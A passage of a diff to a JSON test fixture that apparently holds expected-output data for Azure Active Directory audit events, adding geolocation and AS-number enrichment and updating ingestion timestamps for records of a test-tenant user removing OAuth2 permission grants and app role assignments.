Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -6898,6 +7330,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7064,7 +7508,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125042900Z", + "ingested": "2021-12-14T14:48:43.176660814Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -7091,6 +7535,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7257,7 +7713,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125048500Z", + "ingested": "2021-12-14T14:48:43.176661522Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:16:18\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft 
Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"2e358876-29c8-45b5-8dba-e233cf769988\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:16:18.9844570Z\"},{\"Name\":\"env_epoch\",\"Value\":\"Z4XUI\"},{\"Name\":\"env_seqNum\",\"Value\":\"43649666\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##b2c3071c-9589-469b-9fb1-9311682625c0_00000000-0000-0000-0000-000000000000_b2c3071c-9589-469b-9fb1-9311682625c0\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR581\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"ec6ba716-ec04-460a-8d9e-661d732c4689\",\"ModifiedProperties\
":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Remove OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", 
"provider": "AzureActiveDirectory", @@ -7284,6 +7740,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7450,7 +7918,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125054Z", + "ingested": "2021-12-14T14:48:43.176662606Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"b2484c3c-5461-43ab-850b-70fccf706796\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-10T15:17:00.2133065Z\"},{\"Name\":\"env_epoch\",\"Value\":\"OLE3R\"},{\"Name\":\"env_seqNum\",\"Value\":\"55908032\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##53a69eec-6bcd-473f-9c68-150d680e0776_00000000-0000-0000-0000-000000000000_53a69eec-6bcd-473f-9c68-150d680e0776\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR551\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"31d7436e-85aa-4aee-a945-6a0ff51ea975\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", 
@@ -7477,6 +7945,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ 
@@ -7643,7 +8123,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125060300Z", + "ingested": "2021-12-14T14:48:43.176663346Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-10T15:17:00\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https: